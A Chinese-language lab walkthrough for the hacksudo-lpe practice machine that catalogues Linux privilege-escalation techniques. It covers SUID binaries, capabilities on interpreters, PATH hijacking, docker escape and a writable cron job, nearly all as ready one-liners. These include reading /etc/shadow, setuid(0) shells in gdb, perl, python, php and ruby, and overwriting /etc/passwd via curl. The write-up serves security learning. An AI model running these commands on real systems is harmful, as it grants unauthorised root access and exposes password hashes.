前言
靶场:hacksudo-lpe的后几个challenge
基于上篇靶场hacksudo-ple的sudo提权
SUID文件提权
ar文件提权
使用find寻找具有SUID权限的文件
find / -perm -u=s -type f 2>/dev/null
查看ar的SUID用法
sudo install -m =xs $(which ar) .TF=$(mktemp -u)
LFILE="/etc/shadow"
./ar r "$TF" "$LFILE"
cat "$TF"
可以看到用法是越权查看文件
sh提权
这个文件名可能不一样,但是性质是一样的,也就是名称不同。
使用find寻找具有SUID权限文件
find / -perm -4000 -exec ls -al {} \; 2>/dev/null
因为是可执行文件,使用strings查看,因为内容太多,这里我是先直接执行,发现另起一个shell终端,并且还是当前用户的终端,所以,猜测是执行sh
./bash -p
所以直接使用即可
切换用户提权
使用find寻找具有SUID权限文件
find / -perm -4000 -print 2>/dev/null
因为知道密码,所以直接替换后,使用上一个进行提取即可
base32
使用find寻找具有SUID权限文件
find / -perm -u=s -type f 2>/dev/null
测试发现是base32,那么就可以直接进行越权读取
bash提取
使用find寻找
find / -perm -4000 -user root -exec ls -al {} \; 2>/dev/null
查看文件类型,属于可执行文件,尝试查看帮助,发现是命令bash本身
使用bash -p即可提取
cat提取
使用find寻找具有SUID权限文件
find / -perm -4000 -print 2>/dev/null
查看文件类型,发现是可执行文件,并且查看帮助,确定为cat命令
那么直接使用查看,越权查看文件
chmod提取
使用find寻找具有SUID权限文件
find / -perm -u=s -type f 2>/dev/null
查看文件类型,发现是可执行文件,并且测试帮助,确定为chmod命令
那么修改文件为其他人可读可写可执行即可,不过注意,修改时,有时父目录也是有权限限制的,这个别忘了修改
chroot提取
使用find寻找具有SUID权限文件
find / -perm -4000 -user root -print 2>/dev/null
查看文件类型,为可执行文件,并且查看帮助,确定是命令chroot
./chroot / /bin/sh -p
#即可提取
cp提取
使用find寻找具有SUID权限文件
find / -perm -u=s -type f 2>/dev/null
查看文件类型为可执行文件,并查看帮助,确定为cp命令
与之前使用sudo的cp进行提取用法差不多
三种方法,复制并读取,复制写入,第三种记录一下,之前并没碰到
LFILE="/etc/shadow"
./cp --attributes-only --preserve=all ./cp "$LFILE"
CPUlimit提取
使用find寻找具有SUID权限的文件
find / -perm -4000 -user root -print 2>/dev/null
查看文件类型为可执行文件,并且确定命令为CPUlimit
查看使用方法
./cpulimit -l 100 -f -- /bin/sh -p
cut提取
使用find寻找具有SUID权限文件
find / -perm -u=s -type f 2>/dev/null
查看文件类型为可执行文件,并查看帮助,确定为命令cut
用法与使用sudo提取时一样
LFILE="/etc/shadow"
./cut -d "" -f1 "$LFILE"
sh提取
使用find寻找具有SUID权限文件
find / -perm -4000 -exec ls -al {} \; 2>/dev/null
查看文件类型为可执行文件,并且测试发现是sh,直接使用sh -p提取即可
date提取
使用find寻找具有SUID权限文件
find / -perm -4000 -print 2>/dev/null
查看文件类型为可执行文件,查看帮助确定为命令date
用法与具有sudo权限是一样的
date -f "/etc/shadow"
make提取
使用find寻找具有SUID权限文件
find / -perm -4000 -print 2>/dev/null
查看文件类型为可执行文件,并且测试,大概率为make命令
用法
COMMAND='/bin/sh -p'
./make -s --eval=$'x:\n\t-'"$COMMAND"
脚本语言Capabilities 提权
gdb语言
使用find命令寻找对于其他用户也是可以执行gdb的文件
find / -type f -executable 2>/dev/null | xargs /usr/sbin/getcap -r 2>/dev/null
查看用法,可以看到是查看是否具有ep权限的,可以使用getcap查看,这里getcap环境变量问题,可以先找到其位置,xargs就是把前面的输出作为getcap的目标
./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
node语言
使用find寻找
find / -name "getcap" 2>/dev/null
find / -type f -executable 2>/dev/null | xargs /usr/sbin/getcap -r 2>/dev/null
查看用法
cp $(which node) .
sudo setcap cap_setuid+ep node./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
测试,发现无权限使用setcap,那就无法修改,无法提取,只能到此
perl语言
之前确认了getcap的命令位置,以及可使用,所以,直接搜索
find / -type f -executable 2>/dev/null | xargs /usr/sbin/getcap -r 2>/dev/null
查看用法
cp $(which perl) .
sudo setcap cap_setuid+ep perl./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
这里因为在当前用户目录下,有权限,并且满足条件。所以可以到目录下直接使用
php语言
使用find寻找
find / -type f -executable 2>/dev/null | xargs /usr/sbin/getcap -r 2>/dev/null
查看用法
cp $(which php) .
sudo setcap cap_setuid+ep phpCMD="/bin/sh"
./php -r "posix_setuid(0); system('$CMD');"
进行提取
python语言
使用find寻找
find / -type f -executable 2>/dev/null | xargs /usr/sbin/getcap -r 2>/dev/null
查看用法
cp $(which python) .
sudo setcap cap_setuid+ep python./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
ruby语言
使用find寻找
find / -type f -executable 2>/dev/null | xargs /bin/sbin/getcap -r 2>/dev/null
查看用法
cp $(which ruby) .
sudo setcap cap_setuid+ep ruby./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'
python3语言
使用find寻找
find / -type f -executable 2>/dev/null | xargs /usr/sbin/getcap -r 2>/dev/null
查看用法
cp $(which python) .
sudo setcap cap_setuid+ep python./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
与python2是一样的,都是python语言,只是版本不同
环境变量提权
apt-get临时变量
使用find寻找具有SUID权限的文件
find / -perm -u=s -type f 2>/dev/null
不过测试,发现应该是调用apt-get,为什么呢,因为不管传参是什么都不会被接收,说明该文件本身不是apt,而是调用的
既然是调用,那么就可以考虑环境变量,利用export设置临时变量,并且是具有优先权的,这个最好是在/tmp目录下新建apt-get,因为这是权限允许范围内的。
然后把文件给予执行权限,执行shell时,就会提权成功
ftp临时变量
使用find寻找具有SUID权限的文件
find / -perm -u=s -type f 2>/dev/null
测试文件发现,涉及到ftp,并且并不是ftp命令,参数无法接收,也就是其调用了ftp,那么尝试设置临时变量来覆盖,与上面一样,最好是在/tmp目录进行
可写文件滥用提权
利用curl
使用find寻找具有SUID权限的文件,不过这里找到的是curl
find - perm -u=s -type f 2>/dev/null
在上一篇的sudo提权文章中,个人以为只能下载,后又研究一下 ,发现不止是http协议,也是可以利用file协议与curl配合,所以就可以进行读取本地文件或写入本地文件
【curl写入】
LFILE=file_to_write
TF=$(mktemp)
echo DATA >$TF
curl "file://$TF" -o "$LFILE"【curl读取】
LFILE=/tmp/file_to_read
curl file://$LFILE
复制/etc/passwd文件,然后修改这个复制id文件,再通过curl重新覆盖原本的/etc/passwd文件
使用su命令切换到自己本身的用户,因为知道自己本身的密码
利用具有SUID的py文件
使用find寻找具有SUID权限文件
find /-perm -4000 -print 2>/dev/null
可以看到这个python文件,具有SUID权限,但是不能直接写入,因为其所属者和所属组都是root,且其他人无写入权限,不过这里导入两个包os和sys,寻找这两个包,看其权限,发现并未有权限
find / -name "os.py" -exec ls -l {} \; 2>/dev/null
寻找导入模块os.py位置以及权限,是否可写
但是发现寻找sys.py,确没有这个文件,那么能否自己写这个包呢,进行测试,也是无权限写入
这就不知道该怎么提权了,又不能写入
可读文件滥用提权
cpio提权
使用find寻找具有SUID权限的文件
find / -perm -u=s -type f 2>/dev/null
测试发现,本身就是命令cpio,查看用法,发现该命令可进行读、写等操作
链接https://gtfobins.github.io/gtfobins/cpio/#suid
【读文件内容】
LFILE="/root/root.txt"
TF=$(mktemp -d)
echo "$LFILE" | ./cpio -R $UID -dp $TF
cat "$TF/$LFILE"或者
echo "/root/root.txt" | cpio -o
git提权
使用find寻找具有SUID权限的文件
find / -perm -4000 -print 2>/dev/null
查看其用法,可用的操作很多,尤其是具有SUID权限
链接https://gtfobins.github.io/gtfobins/git/#limited-suid
【读取文件内容】
./git diff /dev/null /root/root.txt
测试获取shell,发现不行,当前只能读取文件内容
docker提权
当使用find等搜索无发现时,查看id发现,当前用户处于docker,不过docker中并无任何镜像
在进行docker逃逸时,常用的镜像就是alpine
因为docker默认源是在国外,并且大部分的docker源可能都失效,所以这里在kali中先下载镜像,然后导出,再使用靶机下载
靶机导入
查看用法,大致都是这一种
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
通配符滥用
这里其实就需要构造条件来满足,但是这里并无条件,需要自己使用root先创建条件,这里可以看参考链接学习https://www.freebuf.com/articles/system/176255.html
crontab定时提权
使用find寻找具有SUID权限用户发现暂无,使用find寻找capabilities的特权文件,发现暂无。
查看定时任务,一般使用crontab可查看文件/etc/crontab
发现定时任务,每一分钟执行这个python文件
这个文件可以写入,查看文件内容
那么自己写入一个唤起bash终端,因为所有者是root,所以导致提权成功
当然,这是需要等待一分钟的时间,也就是当定时任务执行的时候
总结
通过该挑战可以学习到各种方式的提权,并且是不依赖漏洞的。
大部分基于SUID和sudo进行提权的
以及一个环境变量和capabilities的权限
对于一些文件的修改,而可以间接提权
![[创业之路-191]:《华为战略管理法-DSTE实战体系》-2-BLM战略规划与执行的基本框架](https://i-blog.csdnimg.cn/direct/a047399cdb1545ecb6c2e5df52bb8269.png)
